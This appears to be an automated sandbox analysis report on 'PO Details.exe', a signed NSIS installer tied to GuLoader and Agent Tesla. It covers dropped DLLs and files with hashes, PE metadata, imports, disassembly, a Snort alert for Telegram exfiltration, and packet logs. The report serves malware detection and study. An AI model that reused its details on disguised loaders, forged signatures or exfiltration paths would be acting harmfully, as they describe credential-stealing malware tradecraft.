Preview:	FFC426FA9153062999E3257434294214F033588FCEDDF90A39C4AF38C5E863A93EE647E26CE4313E69FA7A178722B21C411F2378FADF7BC0E6F5E0662D5117FB935317C8E5A21D0C6B5A79C42745DE0AB82415E73828EBEB7C812955B810EE08E9970DBDC37A9EC3E2FF43CE8894C9A64800B5BB8C8902EF0543EA5CB3D7C391D129477F41F3E5424C262E283E48A45901C047BCB1D98B0AC96396D8326077113EB67ECC24FD1636D57A5CE33909DA1B8DCE9E7DEA6517022FB50AAFBD3DA6626299D0137383EABBFA8876A3271CA6F88AA369345C5B58E97A35EF701F35E50C8C68F744AB00CF81C017FEDB807AD65669B11C5DAC56B33F3852FA62F7283FE20640313944F9180C79F32417CC0C3D7BBBA0CFA769AD98F666579F381FE21AE09F6FECF016E8C87BBF3915C029484A72C0ACE81612330C3179982F060775572BE86B94D0FC71763523276540BC65CA580F158C165E543066F57D8841F9303B49999C5CD54C8C4ED2CCF55AE58CBE0A104022C6EAF1A5C07E3B8009AEBF9B0F8351D18E09A371F1039AA78ED246271F77F83841BBECE994DC51F8D57375702B411FF6BF4DBB81DF8EC96B6492252A9B3E26EDD36B3B7FB28D20E4E892CE7F2E3D066E74BDEC81CBD2B17A73FA7A381B4F06F75BB0494C03EF1E3AFBD35008052AC28D1892578A9BBF105A0446D90974B94F5823B2

C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Indbildte\Jvnfrelse\Ozonizations\Forskelsbehandlingen9.Unm

Download File

Process:	C:\Users\user\Desktop\PO Details.exe
File Type:	data
Category:	dropped
Size (bytes):	93226
Entropy (8bit):	7.36053580078369
Encrypted:	false
SSDEEP:	1536:Pgi+SrChRRcHzKuk9uEB7MG7xttMQjyDxj3QLiDR3jV9Z:v+SrChRQVs76KxttMBj2iN3jV
MD5:	5EABCF563FA47D54B0CEC65F3C2A8AB0
SHA1:	AC297A96F3E6ADAD996BB844DCA2A5775CD461DA
SHA-256:	316FBF91666AC96730800F736053940B0C1456E803C76A2D4042BA5F11E0BA7A
SHA-512:	0ADC33D6641AAB338D7DF0EC426814A6EB9FA0CB84B20A8E7F0F161B136A74285A7CDCBCB914EDBFB7003DE08B0A341E19774E0BD90F92C6364B47938B391DAD
Malicious:	false
Preview:	.$.=7r_..U.u..:....5..0.&...`P9 ..\4.@......A....t.H.}66.r...K.r....@.B.....i....yR..p`....v%v."..{\.ftM...UP>..... z.p.R._.R(..k$../....6.....:..\|.e...lBO~.+Z.J....F_;.,`.n.Q........b....p.f#.n?..B.8..l..M.N.C..pQQ.;..Q.H.Z.\..........jKC.8...E..[.[..wb]..3d.0............$.+....KdXds...5m..4.)U.P.(....1n...l....qR..?mxY.`.....8....R..{...A.a.h...x.G}..S..f .w.v.RP...K.)g.Fm..[../.W.}&.Q.T.{&O.fS.k%{y..=r...-...el.?.>....W.R>>.C3p"....q...k:..4L~..ey?w.}..I(.WX...(..O$.T.........ip;.......^..(._0:!\....E.&.....`.........p....T.j..Tq=p.\).{)..E.#.jVB..V.z...2[....4.qKxp...p,.Xb^..&.?..3.$T'..f.e........:.2..g.v.+t,N.PC......v..6..k".L ../..7]....-..Z.Z0.OD..b..;.J.ecV(.........-.N-...T.....n......7....H.CH......1..h.+Hv.^..r;.i.1.V.i..49.".......>!a...B..?&...!..8n.....D.c......_.....Q.......y.... .m.Y...."....;..?.e.........w....3.;..aH.....3..jjR../......F...h.)..\|eH<RL..%7.{.AO.'...X.F....D..tJ.}.7....6D3.,-X.Nx...G..VN..C:..fP.J

C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Junkere\lang-1038.dll

Download File

Process:	C:\Users\user\Desktop\PO Details.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	170504
Entropy (8bit):	3.8894730756626315
Encrypted:	false
SSDEEP:	3072:WAk2jlc69HieVvyQfEJfA4aHUf8pgFjQzrDJsU+Lewl8w0i8KEdrMFMJgMER+d/r:XPpTrL
MD5:	30A4654EF838936FAAD8E3532EA3B9A4
SHA1:	75B30B63B130496FFAE16256FB49924C551B122D
SHA-256:	1D8585F60A4100CBA595A7AAD3C0A71785D9F66C05F9DB1FAE8C63C0AE5CDB0D
SHA-512:	9F121B3F71385613ACFA1E082161EB85FA81D0EC0161623EE7AE12AA6FA978284B0703BF9EDFD5F9310F3299D7A4D0566721E429714C73C14993ABAB60E8363A
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: PO Details.exe, Detection: malicious, Browse Filename: quote.exe, Detection: malicious, Browse Filename: quote.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.@...R.@.P...R.Rich..R.................PE..L....\)b...........!.........x.......................................................T....@.......................................... ...t...........z... ...........................................................................................rdata..p...........................@..@.rsrc....t... ...v..................@..@.....\)b........T........................rdata......T....rdata$zzzdbg.... ... ...rsrc$01.....@...S...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\PO Details.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.737465490490623
Encrypted:	false
SSDEEP:	192:uenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBUIwL:u8+Qlt70Fj/lQRY/9Vjj+L
MD5:	A1DA6788AEAF78CA4AE1DECE8019E49D
SHA1:	D770155E6E9AA69223BE198C44A8DA26A1756D89
SHA-256:	B7823A15E7B1866BA3D77248F750B66505859D264CFC39D8C8C5E812F8AE4A81
SHA-512:	EADA9C1528563DDFE3D4D8ED5DBC52B85A9190765535B68DA90E6D623288BF0090ADAC5118E1ED6E3CB3E0ABB9AF025D3A2A73121413A4471A90FD04BC861E18
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 4%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: PO Details.exe, Detection: malicious, Browse Filename: Bulbine40.exe, Detection: malicious, Browse Filename: Bulbine40.exe, Detection: malicious, Browse Filename: quote.exe, Detection: malicious, Browse Filename: quote.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.VHO.Trojan.Win32.GuLoader.gen.3312.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.VHO.Trojan.Win32.GuLoader.gen.3312.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....$_...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.....................@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Preview:	NordVPN directory not found!..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.798919264161505
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PO Details.exe
File size:	180208
MD5:	111af5ceb406185d5c636c90292b6a0a
SHA1:	8e5b0aa304a80b01c42f8b755c25ac2cee7b791c
SHA256:	a417b6091524654d2ab0f4893e7d65cd9d35c54063a6865f30d5d3c45a405730
SHA512:	adfba45ce9aec1d7dce6e3d0fcae44195431cd8c01c909d346d59daea82626bf1650998d625e4a6790ceb1ed76360ff3afb88043cdda630de4275c83186c2910
SSDEEP:	3072:5NRCywDw1DiJku3XzubJ/hqTbr4oJG3NijN5cdZWarJixg5xKimg2Qz:5T4DtbX09hqTbr4oUcjuZvKimzQz
TLSH:	4E0402102771D1A7D6A24571357B7BBBBAF6A01A5020AF1B33B03A5D3D22B50C82FB57
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....$_.................h.........

File Icon


Icon Hash:	74e4d4d4e4f4d4d4

Static PE Info

General

Entrypoint:	0x4034c5
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5F24A9CD [Fri Jul 31 23:31:25 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	6e7f9a29f2c85394521a08b9f31f6275

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Broslagningernes Stavende Herty ", OU="Parathyroprivic Anonymiteter Familiepolitik ", E=Dunken@Songhai41.Ce, O=Nauplplii, L=Costa, S=West Virginia, C=US
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	17/04/2022 00:19:02 16/04/2025 00:19:02
Subject Chain	CN="Broslagningernes Stavende Herty ", OU="Parathyroprivic Anonymiteter Familiepolitik ", E=Dunken@Songhai41.Ce, O=Nauplplii, L=Costa, S=West Virginia, C=US
Version:	3
Thumbprint MD5:	B50F144ACE041257B61DC74BE45B8195
Thumbprint SHA-1:	E0D8FEBCDE004098A98F2C7D4E1CC33BE250E6AD
Thumbprint SHA-256:	2DCDE4CEE9E30F013718841BDFFB1227E642352E848F34B39070AD7E06E671BA
Serial:	92DAFD8A9CB4C8C7

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080CCh]
call dword ptr [004080D0h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [00434F0Ch], eax
je 00007FCE9C551383h
push ebx
call 00007FCE9C554671h
cmp eax, ebx
je 00007FCE9C551379h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007FCE9C5545EBh
push esi
call dword ptr [00408154h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FCE9C55135Ch
push 0000000Bh
call 00007FCE9C554644h
push 00000009h
call 00007FCE9C55463Dh
push 00000007h
mov dword ptr [00434F04h], eax
call 00007FCE9C554631h
cmp eax, ebx
je 00007FCE9C551381h
push 0000001Eh
call eax
test eax, eax
je 00007FCE9C551379h
or byte ptr [00434F0Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408298h]
mov dword ptr [00434FD8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0042B228h
call dword ptr [0040818Ch]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8610	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6e000	0x1fa0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x2b870	0x780	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6793	0x6800	False	0.6720628004807693	data	6.495258513279076	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x14a4	0x1600	False	0.4385653409090909	data	5.01371465125838	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2b018	0x600	False	0.5240885416666666	data	4.155579717739458	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x36000	0x38000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6e000	0x1fa0	0x2000	False	0.3719482421875	data	4.9946939763888	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x6e268	0x368	data	English	United States
RT_ICON	0x6e5d0	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0	English	United States
RT_DIALOG	0x6f678	0x144	data	English	United States
RT_DIALOG	0x6f7c0	0x13c	data	English	United States
RT_DIALOG	0x6f900	0x100	data	English	United States
RT_DIALOG	0x6fa00	0x11c	data	English	United States
RT_DIALOG	0x6fb20	0xc4	data	English	United States
RT_DIALOG	0x6fbe8	0x60	data	English	United States
RT_GROUP_ICON	0x6fc48	0x14	data	English	United States
RT_MANIFEST	0x6fc60	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.20149.154.167.220497784432851779 08/23/22-13:22:01.899347	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49778	443	192.168.11.20	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2022 13:21:49.738384008 CEST	49776	80	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:49.747178078 CEST	80	49776	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:49.747400045 CEST	49776	80	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:49.747915983 CEST	49776	80	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:49.756725073 CEST	80	49776	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:49.763501883 CEST	80	49776	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:49.763722897 CEST	49776	80	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:49.767272949 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:49.767349005 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:49.767498970 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:49.787961006 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:49.788008928 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:49.832752943 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:49.833034992 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:49.963017941 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:49.963108063 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:49.963805914 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:49.963939905 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:49.968964100 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.010555029 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.224555016 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.224780083 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.224834919 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.225158930 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.225191116 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.225380898 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.225523949 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.225581884 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.225619078 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.225816011 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.225841045 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.225867987 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.226092100 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.226124048 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.226272106 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.226305008 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.226517916 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.226552963 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.226732016 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.226763964 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.226947069 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.226979017 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.227163076 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.227200985 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.227391005 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.227442980 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.227479935 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.227540016 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.227639914 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.227675915 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.227832079 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.227865934 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.228008032 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.228034973 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.228195906 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.228219032 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.228235960 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.228441000 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.228467941 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.228496075 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.228593111 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.228681087 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.228705883 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.228830099 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.228852987 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.228872061 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.228962898 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.228981018 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.228996992 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.229159117 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.229181051 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.229196072 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.229322910 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.229480028 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.236049891 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.236202955 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.236305952 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.236653090 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.236666918 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.236706972 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.237000942 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.237011909 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.237046957 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.237322092 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.237370968 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.237402916 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.237476110 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.237566948 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.237621069 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.237802029 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.237832069 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.237982988 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.238022089 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.238171101 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.238209009 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.238369942 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.238456964 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.238518953 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.238555908 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.238691092 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.238732100 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.239017010 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.239051104 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.239195108 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.239411116 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.247005939 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.247216940 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.247284889 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.247489929 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.247667074 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.247740984 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.247792006 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.247824907 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.247893095 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.247912884 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.247997046 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.248096943 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.248233080 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.248302937 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.248359919 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.248560905 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.248627901 CEST	49777	443	192.168.11.20	162.159.130.233
Aug 23, 2022 13:21:50.248835087 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.249131918 CEST	443	49777	162.159.130.233	192.168.11.20
Aug 23, 2022 13:21:50.249250889 CEST	49777	443	192.168.11.20	162.159.130.233
